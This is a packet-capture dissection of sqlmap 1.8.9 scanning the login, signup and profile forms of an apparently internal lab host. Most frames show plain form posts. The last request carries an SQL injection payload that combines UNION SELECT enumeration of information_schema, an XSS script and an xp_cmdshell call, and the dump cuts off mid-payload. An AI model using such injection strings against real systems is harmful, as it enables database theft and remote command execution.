Frame 132229: 98 bytes on wire (784 bits), 98 bytes captured (784 bits)
    Encapsulation type: Ethernet (1)
    Arrival Time: Apr 14, 2025 16:04:09.939755000 CEST
    UTC Arrival Time: Apr 14, 2025 14:04:09.939755000 UTC
    Epoch Arrival Time: 1744639449.939755000
    [Time shift for this packet: 0.000000000 seconds]
    [Time delta from previous captured frame: 0.000018000 seconds]
    [Time delta from previous displayed frame: 0.000000000 seconds]
    [Time since reference or first frame: 128.965714000 seconds]
    Frame Number: 132229
    Frame Length: 98 bytes (784 bits)
    Capture Length: 98 bytes (784 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp:http:urlencoded-form]
Ethernet II, Src: 02:42:0a:14:00:08 (02:42:0a:14:00:08), Dst: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
    Destination: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: 02:42:0a:14:00:08 (02:42:0a:14:00:08)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
    [Stream index: 2]
Internet Protocol Version 4, Src: 10.20.0.8, Dst: 10.20.2.45
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 84
    Identification: 0xcce2 (52450)
    010. .... = Flags: 0x2, Don't fragment
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 64
    Protocol: TCP (6)
    Header Checksum: 0x5765 [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 10.20.0.8
    Destination Address: 10.20.2.45
    [Stream index: 1]
Transmission Control Protocol, Src Port: 46164, Dst Port: 8888, Seq: 271, Ack: 1, Len: 32
    Source Port: 46164
    Destination Port: 8888
    [Stream index: 65539]
    [Stream Packet Number: 6]
    [Conversation completeness: Incomplete, DATA (15)]
        ..0. .... = RST: Absent
        ...0 .... = FIN: Absent
        .... 1... = Data: Present
        .... .1.. = ACK: Present
        .... ..1. = SYN-ACK: Present
        .... ...1 = SYN: Present
        [Completeness Flags: ··DASS]
    [TCP Segment Len: 32]
    Sequence Number: 271    (relative sequence number)
    Sequence Number (raw): 460361931
    [Next Sequence Number: 303    (relative sequence number)]
    Acknowledgment Number: 1    (relative ack number)
    Acknowledgment number (raw): 4111639123
    1000 .... = Header Length: 32 bytes (8)
    Flags: 0x018 (PSH, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Accurate ECN: Not set
        .... 0... .... = Congestion Window Reduced: Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 1... = Push: Set
        .... .... .0.. = Reset: Not set
        .... .... ..0. = Syn: Not set
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······AP···]
    Window: 502
    [Calculated window size: 64256]
    [Window size scaling factor: 128]
    Checksum: 0x16a3 [unverified]
    [Checksum Status: Unverified]
    Urgent Pointer: 0
    Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - Timestamps: TSval 569050853, TSecr 2922829999
            Kind: Time Stamp Option (8)
            Length: 10
            Timestamp value: 569050853
            Timestamp echo reply: 2922829999
    [Timestamps]
        [Time since first frame in this TCP stream: 0.000127000 seconds]
        [Time since previous frame in this TCP stream: 0.000018000 seconds]
    [SEQ/ACK analysis]
        [iRTT: 0.000023000 seconds]
        [Bytes in flight: 32]
        [Bytes sent since last PSH flag: 32]
    TCP payload (32 bytes)
    TCP segment data (32 bytes)
[2 Reassembled TCP Segments (302 bytes): #132227(270), #132229(32)]
    [Frame: 132227, payload: 0-269 (270 bytes)]
    [Frame: 132229, payload: 270-301 (32 bytes)]
    [Segment count: 2]
    [Reassembled TCP length: 302]
    [Reassembled TCP Data […]: 504f5354202f6c6f67696e20485454502f312e310d0a436f6e74656e742d4c656e6774683a2033320d0a43616368652d436f6e74726f6c3a206e6f2d63616368650d0a557365722d4167656e743a2073716c6d61702f312e382e3923737461626c65202868747470733]
Hypertext Transfer Protocol
    POST /login HTTP/1.1\r\n
        Request Method: POST
        Request URI: /login
        Request Version: HTTP/1.1
    Content-Length: 32\r\n
        [Content length: 32]
    Cache-Control: no-cache\r\n
    User-Agent: sqlmap/1.8.9#stable (https://sqlmap.org)\r\n
    Host: alfa.ex:8888\r\n
    Accept: */*\r\n
    Accept-Encoding: gzip,deflate\r\n
    Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n
    Connection: close\r\n
    \r\n
    [Full request URI: http://alfa.ex:8888/login]
    File Data: 32 bytes
HTML Form URL Encoded: application/x-www-form-urlencoded
    Form item: "email" = "username"
        Key: email
        Value: username
    Form item: "password" = "password"
        Key: password
        Value: password

Frame 132243: 98 bytes on wire (784 bits), 98 bytes captured (784 bits)
    Encapsulation type: Ethernet (1)
    Arrival Time: Apr 14, 2025 16:04:09.958624000 CEST
    UTC Arrival Time: Apr 14, 2025 14:04:09.958624000 UTC
    Epoch Arrival Time: 1744639449.958624000
    [Time shift for this packet: 0.000000000 seconds]
    [Time delta from previous captured frame: 0.000045000 seconds]
    [Time delta from previous displayed frame: 0.018869000 seconds]
    [Time since reference or first frame: 128.984583000 seconds]
    Frame Number: 132243
    Frame Length: 98 bytes (784 bits)
    Capture Length: 98 bytes (784 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp:http:urlencoded-form]
Ethernet II, Src: 02:42:0a:14:00:08 (02:42:0a:14:00:08), Dst: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
    Destination: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: 02:42:0a:14:00:08 (02:42:0a:14:00:08)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
    [Stream index: 2]
Internet Protocol Version 4, Src: 10.20.0.8, Dst: 10.20.2.45
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 84
    Identification: 0xd3a1 (54177)
    010. .... = Flags: 0x2, Don't fragment
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 64
    Protocol: TCP (6)
    Header Checksum: 0x50a6 [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 10.20.0.8
    Destination Address: 10.20.2.45
    [Stream index: 1]
Transmission Control Protocol, Src Port: 46174, Dst Port: 8888, Seq: 419, Ack: 1, Len: 32
    Source Port: 46174
    Destination Port: 8888
    [Stream index: 65540]
    [Stream Packet Number: 6]
    [Conversation completeness: Incomplete, DATA (15)]
        ..0. .... = RST: Absent
        ...0 .... = FIN: Absent
        .... 1... = Data: Present
        .... .1.. = ACK: Present
        .... ..1. = SYN-ACK: Present
        .... ...1 = SYN: Present
        [Completeness Flags: ··DASS]
    [TCP Segment Len: 32]
    Sequence Number: 419    (relative sequence number)
    Sequence Number (raw): 2310202656
    [Next Sequence Number: 451    (relative sequence number)]
    Acknowledgment Number: 1    (relative ack number)
    Acknowledgment number (raw): 3045301039
    1000 .... = Header Length: 32 bytes (8)
    Flags: 0x018 (PSH, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Accurate ECN: Not set
        .... 0... .... = Congestion Window Reduced: Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 1... = Push: Set
        .... .... .0.. = Reset: Not set
        .... .... ..0. = Syn: Not set
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······AP···]
    Window: 502
    [Calculated window size: 64256]
    [Window size scaling factor: 128]
    Checksum: 0x16a3 [unverified]
    [Checksum Status: Unverified]
    Urgent Pointer: 0
    Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - Timestamps: TSval 569050872, TSecr 2922830018
            Kind: Time Stamp Option (8)
            Length: 10
            Timestamp value: 569050872
            Timestamp echo reply: 2922830018
    [Timestamps]
        [Time since first frame in this TCP stream: 0.013477000 seconds]
        [Time since previous frame in this TCP stream: 0.000045000 seconds]
    [SEQ/ACK analysis]
        [iRTT: 0.000024000 seconds]
        [Bytes in flight: 32]
        [Bytes sent since last PSH flag: 32]
    TCP payload (32 bytes)
    TCP segment data (32 bytes)
[2 Reassembled TCP Segments (450 bytes): #132241(418), #132243(32)]
    [Frame: 132241, payload: 0-417 (418 bytes)]
    [Frame: 132243, payload: 418-449 (32 bytes)]
    [Segment count: 2]
    [Reassembled TCP length: 450]
    [Reassembled TCP Data […]: 504f5354202f7369676e757020485454502f312e310d0a436f6e74656e742d4c656e6774683a2033320d0a43616368652d436f6e74726f6c3a206e6f2d63616368650d0a557365722d4167656e743a2073716c6d61702f312e382e3923737461626c652028687474707]
Hypertext Transfer Protocol
    POST /signup HTTP/1.1\r\n
        Request Method: POST
        Request URI: /signup
        Request Version: HTTP/1.1
    Content-Length: 32\r\n
        [Content length: 32]
    Cache-Control: no-cache\r\n
    User-Agent: sqlmap/1.8.9#stable (https://sqlmap.org)\r\n
    Host: alfa.ex:8888\r\n
    Accept: */*\r\n
    Accept-Encoding: gzip,deflate\r\n
    Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n
    Cookie: sweet=eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIlBsZWFzZSBzaWduIHVwIGJlZm9yZSEiXX1dfQ.Z_0V2Q.-w8YW8cMp9jo72ttyoe8c3RGZDk; HttpOnly; Path=/\r\n
        Cookie pair: sweet=eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIlBsZWFzZSBzaWduIHVwIGJlZm9yZSEiXX1dfQ.Z_0V2Q.-w8YW8cMp9jo72ttyoe8c3RGZDk
        Cookie pair: HttpOnly
        Cookie pair: Path=/
    Connection: close\r\n
    \r\n
    [Full request URI: http://alfa.ex:8888/signup]
    File Data: 32 bytes
HTML Form URL Encoded: application/x-www-form-urlencoded
    Form item: "email" = "username"
        Key: email
        Value: username
    Form item: "password" = "password"
        Key: password
        Value: password

Frame 132262: 98 bytes on wire (784 bits), 98 bytes captured (784 bits)
    Encapsulation type: Ethernet (1)
    Arrival Time: Apr 14, 2025 16:04:10.627525000 CEST
    UTC Arrival Time: Apr 14, 2025 14:04:10.627525000 UTC
    Epoch Arrival Time: 1744639450.627525000
    [Time shift for this packet: 0.000000000 seconds]
    [Time delta from previous captured frame: 0.000024000 seconds]
    [Time delta from previous displayed frame: 0.668901000 seconds]
    [Time since reference or first frame: 129.653484000 seconds]
    Frame Number: 132262
    Frame Length: 98 bytes (784 bits)
    Capture Length: 98 bytes (784 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp:http:urlencoded-form]
Ethernet II, Src: 02:42:0a:14:00:08 (02:42:0a:14:00:08), Dst: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
    Destination: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: 02:42:0a:14:00:08 (02:42:0a:14:00:08)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
    [Stream index: 2]
Internet Protocol Version 4, Src: 10.20.0.8, Dst: 10.20.2.45
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 84
    Identification: 0x4deb (19947)
    010. .... = Flags: 0x2, Don't fragment
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 64
    Protocol: TCP (6)
    Header Checksum: 0xd65c [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 10.20.0.8
    Destination Address: 10.20.2.45
    [Stream index: 1]
Transmission Control Protocol, Src Port: 46180, Dst Port: 8888, Seq: 418, Ack: 1, Len: 32
    Source Port: 46180
    Destination Port: 8888
    [Stream index: 65541]
    [Stream Packet Number: 6]
    [Conversation completeness: Incomplete, DATA (15)]
        ..0. .... = RST: Absent
        ...0 .... = FIN: Absent
        .... 1... = Data: Present
        .... .1.. = ACK: Present
        .... ..1. = SYN-ACK: Present
        .... ...1 = SYN: Present
        [Completeness Flags: ··DASS]
    [TCP Segment Len: 32]
    Sequence Number: 418    (relative sequence number)
    Sequence Number (raw): 4105916910
    [Next Sequence Number: 450    (relative sequence number)]
    Acknowledgment Number: 1    (relative ack number)
    Acknowledgment number (raw): 2414985359
    1000 .... = Header Length: 32 bytes (8)
    Flags: 0x018 (PSH, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Accurate ECN: Not set
        .... 0... .... = Congestion Window Reduced: Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 1... = Push: Set
        .... .... .0.. = Reset: Not set
        .... .... ..0. = Syn: Not set
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······AP···]
    Window: 502
    [Calculated window size: 64256]
    [Window size scaling factor: 128]
    Checksum: 0x16a3 [unverified]
    [Checksum Status: Unverified]
    Urgent Pointer: 0
    Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - Timestamps: TSval 569051541, TSecr 2922830687
            Kind: Time Stamp Option (8)
            Length: 10
            Timestamp value: 569051541
            Timestamp echo reply: 2922830687
    [Timestamps]
        [Time since first frame in this TCP stream: 0.668864000 seconds]
        [Time since previous frame in this TCP stream: 0.000024000 seconds]
    [SEQ/ACK analysis]
        [iRTT: 0.000022000 seconds]
        [Bytes in flight: 32]
        [Bytes sent since last PSH flag: 32]
    TCP payload (32 bytes)
    TCP segment data (32 bytes)
[2 Reassembled TCP Segments (449 bytes): #132260(417), #132262(32)]
    [Frame: 132260, payload: 0-416 (417 bytes)]
    [Frame: 132262, payload: 417-448 (32 bytes)]
    [Segment count: 2]
    [Reassembled TCP length: 449]
    [Reassembled TCP Data […]: 504f5354202f6c6f67696e20485454502f312e310d0a436f6e74656e742d4c656e6774683a2033320d0a43616368652d436f6e74726f6c3a206e6f2d63616368650d0a557365722d4167656e743a2073716c6d61702f312e382e3923737461626c65202868747470733]
Hypertext Transfer Protocol
    POST /login HTTP/1.1\r\n
        Request Method: POST
        Request URI: /login
        Request Version: HTTP/1.1
    Content-Length: 32\r\n
        [Content length: 32]
    Cache-Control: no-cache\r\n
    User-Agent: sqlmap/1.8.9#stable (https://sqlmap.org)\r\n
    Host: alfa.ex:8888\r\n
    Accept: */*\r\n
    Accept-Encoding: gzip,deflate\r\n
    Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n
    Cookie: sweet=eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIlBsZWFzZSBzaWduIHVwIGJlZm9yZSEiXX1dfQ.Z_0V2Q.-w8YW8cMp9jo72ttyoe8c3RGZDk; HttpOnly; Path=/\r\n
        Cookie pair: sweet=eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIlBsZWFzZSBzaWduIHVwIGJlZm9yZSEiXX1dfQ.Z_0V2Q.-w8YW8cMp9jo72ttyoe8c3RGZDk
        Cookie pair: HttpOnly
        Cookie pair: Path=/
    Connection: close\r\n
    \r\n
    [Full request URI: http://alfa.ex:8888/login]
    File Data: 32 bytes
HTML Form URL Encoded: application/x-www-form-urlencoded
    Form item: "email" = "username"
        Key: email
        Value: username
    Form item: "password" = "password"
        Key: password
        Value: password

Frame 132280: 98 bytes on wire (784 bits), 98 bytes captured (784 bits)
    Encapsulation type: Ethernet (1)
    Arrival Time: Apr 14, 2025 16:04:11.270793000 CEST
    UTC Arrival Time: Apr 14, 2025 14:04:11.270793000 UTC
    Epoch Arrival Time: 1744639451.270793000
    [Time shift for this packet: 0.000000000 seconds]
    [Time delta from previous captured frame: 0.000026000 seconds]
    [Time delta from previous displayed frame: 0.643268000 seconds]
    [Time since reference or first frame: 130.296752000 seconds]
    Frame Number: 132280
    Frame Length: 98 bytes (784 bits)
    Capture Length: 98 bytes (784 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp:http:urlencoded-form]
Ethernet II, Src: 02:42:0a:14:00:08 (02:42:0a:14:00:08), Dst: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
    Destination: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: 02:42:0a:14:00:08 (02:42:0a:14:00:08)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
    [Stream index: 2]
Internet Protocol Version 4, Src: 10.20.0.8, Dst: 10.20.2.45
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 84
    Identification: 0x1b40 (6976)
    010. .... = Flags: 0x2, Don't fragment
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 64
    Protocol: TCP (6)
    Header Checksum: 0x0908 [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 10.20.0.8
    Destination Address: 10.20.2.45
    [Stream index: 1]
Transmission Control Protocol, Src Port: 49346, Dst Port: 8888, Seq: 590, Ack: 1, Len: 32
    Source Port: 49346
    Destination Port: 8888
    [Stream index: 65542]
    [Stream Packet Number: 6]
    [Conversation completeness: Incomplete, DATA (15)]
        ..0. .... = RST: Absent
        ...0 .... = FIN: Absent
        .... 1... = Data: Present
        .... .1.. = ACK: Present
        .... ..1. = SYN-ACK: Present
        .... ...1 = SYN: Present
        [Completeness Flags: ··DASS]
    [TCP Segment Len: 32]
    Sequence Number: 590    (relative sequence number)
    Sequence Number (raw): 604810989
    [Next Sequence Number: 622    (relative sequence number)]
    Acknowledgment Number: 1    (relative ack number)
    Acknowledgment number (raw): 476929329
    1000 .... = Header Length: 32 bytes (8)
    Flags: 0x018 (PSH, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Accurate ECN: Not set
        .... 0... .... = Congestion Window Reduced: Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 1... = Push: Set
        .... .... .0.. = Reset: Not set
        .... .... ..0. = Syn: Not set
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······AP···]
    Window: 502
    [Calculated window size: 64256]
    [Window size scaling factor: 128]
    Checksum: 0x16a3 [unverified]
    [Checksum Status: Unverified]
    Urgent Pointer: 0
    Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - Timestamps: TSval 569052184, TSecr 2922831330
            Kind: Time Stamp Option (8)
            Length: 10
            Timestamp value: 569052184
            Timestamp echo reply: 2922831330
    [Timestamps]
        [Time since first frame in this TCP stream: 0.642625000 seconds]
        [Time since previous frame in this TCP stream: 0.000026000 seconds]
    [SEQ/ACK analysis]
        [iRTT: 0.000023000 seconds]
        [Bytes in flight: 32]
        [Bytes sent since last PSH flag: 32]
    TCP payload (32 bytes)
    TCP segment data (32 bytes)
[2 Reassembled TCP Segments (621 bytes): #132278(589), #132280(32)]
    [Frame: 132278, payload: 0-588 (589 bytes)]
    [Frame: 132280, payload: 589-620 (32 bytes)]
    [Segment count: 2]
    [Reassembled TCP length: 621]
    [Reassembled TCP Data […]: 504f5354202f70726f66696c6520485454502f312e310d0a436f6e74656e742d4c656e6774683a2033320d0a43616368652d436f6e74726f6c3a206e6f2d63616368650d0a557365722d4167656e743a2073716c6d61702f312e382e3923737461626c6520286874747]
Hypertext Transfer Protocol
    POST /profile HTTP/1.1\r\n
        Request Method: POST
        Request URI: /profile
        Request Version: HTTP/1.1
    Content-Length: 32\r\n
        [Content length: 32]
    Cache-Control: no-cache\r\n
    User-Agent: sqlmap/1.8.9#stable (https://sqlmap.org)\r\n
    Host: alfa.ex:8888\r\n
    Accept: */*\r\n
    Accept-Encoding: gzip,deflate\r\n
    Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n
     […]Cookie: sweet=.eJwljjuOAjEQBa8y2zGB7W577DnF5iuEuu1nQGI_GjMR4u4M2qheBU-qB536TccFg5avB033HfSNMfQMOtDnDTowjev5Z9r-JkP_XfFBx-fxsB9XjAst93XDbtdGC2ntMhe21FmFk3EEs4QczSRxit6VJqXBISFWDl4YLlvITaNTlWbZO3XGraiHOUaduQV43XcsZpxrgYgvHF1Xl1PvTbhJLb
        Cookie pair […]: sweet=.eJwljjuOAjEQBa8y2zGB7W577DnF5iuEuu1nQGI_GjMR4u4M2qheBU-qB536TccFg5avB033HfSNMfQMOtDnDTowjev5Z9r-JkP_XfFBx-fxsB9XjAst93XDbtdGC2ntMhe21FmFk3EEs4QczSRxit6VJqXBISFWDl4YLlvITaNTlWbZO3XGraiHOUaduQV43XcsZpxrgYgvHF1Xl1PvT
        Cookie pair: HttpOnly
        Cookie pair: Path=/
        Cookie pair: Path=/
    Connection: close\r\n
    \r\n
    [Full request URI: http://alfa.ex:8888/profile]
    File Data: 32 bytes
HTML Form URL Encoded: application/x-www-form-urlencoded
    Form item: "email" = "username"
        Key: email
        Value: username
    Form item: "password" = "password"
        Key: password
        Value: password

Frame 132294: 98 bytes on wire (784 bits), 98 bytes captured (784 bits)
    Encapsulation type: Ethernet (1)
    Arrival Time: Apr 14, 2025 16:04:11.293326000 CEST
    UTC Arrival Time: Apr 14, 2025 14:04:11.293326000 UTC
    Epoch Arrival Time: 1744639451.293326000
    [Time shift for this packet: 0.000000000 seconds]
    [Time delta from previous captured frame: 0.000024000 seconds]
    [Time delta from previous displayed frame: 0.022533000 seconds]
    [Time since reference or first frame: 130.319285000 seconds]
    Frame Number: 132294
    Frame Length: 98 bytes (784 bits)
    Capture Length: 98 bytes (784 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp:http:urlencoded-form]
Ethernet II, Src: 02:42:0a:14:00:08 (02:42:0a:14:00:08), Dst: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
    Destination: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: 02:42:0a:14:00:08 (02:42:0a:14:00:08)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
    [Stream index: 2]
Internet Protocol Version 4, Src: 10.20.0.8, Dst: 10.20.2.45
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 84
    Identification: 0xc8d3 (51411)
    010. .... = Flags: 0x2, Don't fragment
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 64
    Protocol: TCP (6)
    Header Checksum: 0x5b74 [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 10.20.0.8
    Destination Address: 10.20.2.45
    [Stream index: 1]
Transmission Control Protocol, Src Port: 49350, Dst Port: 8888, Seq: 827, Ack: 1, Len: 32
    Source Port: 49350
    Destination Port: 8888
    [Stream index: 65543]
    [Stream Packet Number: 6]
    [Conversation completeness: Incomplete, DATA (15)]
        ..0. .... = RST: Absent
        ...0 .... = FIN: Absent
        .... 1... = Data: Present
        .... .1.. = ACK: Present
        .... ..1. = SYN-ACK: Present
        .... ...1 = SYN: Present
        [Completeness Flags: ··DASS]
    [TCP Segment Len: 32]
    Sequence Number: 827    (relative sequence number)
    Sequence Number (raw): 1603515742
    [Next Sequence Number: 859    (relative sequence number)]
    Acknowledgment Number: 1    (relative ack number)
    Acknowledgment number (raw): 3334937345
    1000 .... = Header Length: 32 bytes (8)
    Flags: 0x018 (PSH, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Accurate ECN: Not set
        .... 0... .... = Congestion Window Reduced: Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 1... = Push: Set
        .... .... .0.. = Reset: Not set
        .... .... ..0. = Syn: Not set
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······AP···]
    Window: 502
    [Calculated window size: 64256]
    [Window size scaling factor: 128]
    Checksum: 0x16a3 [unverified]
    [Checksum Status: Unverified]
    Urgent Pointer: 0
    Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - Timestamps: TSval 569052207, TSecr 2922831353
            Kind: Time Stamp Option (8)
            Length: 10
            Timestamp value: 569052207
            Timestamp echo reply: 2922831353
    [Timestamps]
        [Time since first frame in this TCP stream: 0.010035000 seconds]
        [Time since previous frame in this TCP stream: 0.000024000 seconds]
    [SEQ/ACK analysis]
        [iRTT: 0.000038000 seconds]
        [Bytes in flight: 32]
        [Bytes sent since last PSH flag: 32]
    TCP payload (32 bytes)
    TCP segment data (32 bytes)
[2 Reassembled TCP Segments (858 bytes): #132292(826), #132294(32)]
    [Frame: 132292, payload: 0-825 (826 bytes)]
    [Frame: 132294, payload: 826-857 (32 bytes)]
    [Segment count: 2]
    [Reassembled TCP length: 858]
    [Reassembled TCP Data […]: 504f5354202f6c6f67696e3f76574b4a3d32343838253230414e442532303125334431253230554e494f4e253230414c4c25323053454c454354253230312532434e554c4c253243253237253343736372697074253345616c657274253238253232585353253232253]
Hypertext Transfer Protocol
     […]POST /login?vWKJ=2488%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27
        Request Method: POST
        Request URI […]: /login?vWKJ=2488%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshe
            Request URI Path: /login
            Request URI Query […]: vWKJ=2488%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshel
                Request URI Query Parameter […]: vWKJ=2488%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20
        Request Version: HTTP/1.1
    Content-Length: 32\r\n
        [Content length: 32]
    Cache-Control: no-cache\r\n
    User-Agent: sqlmap/1.8.9#stable (https://sqlmap.org)\r\n
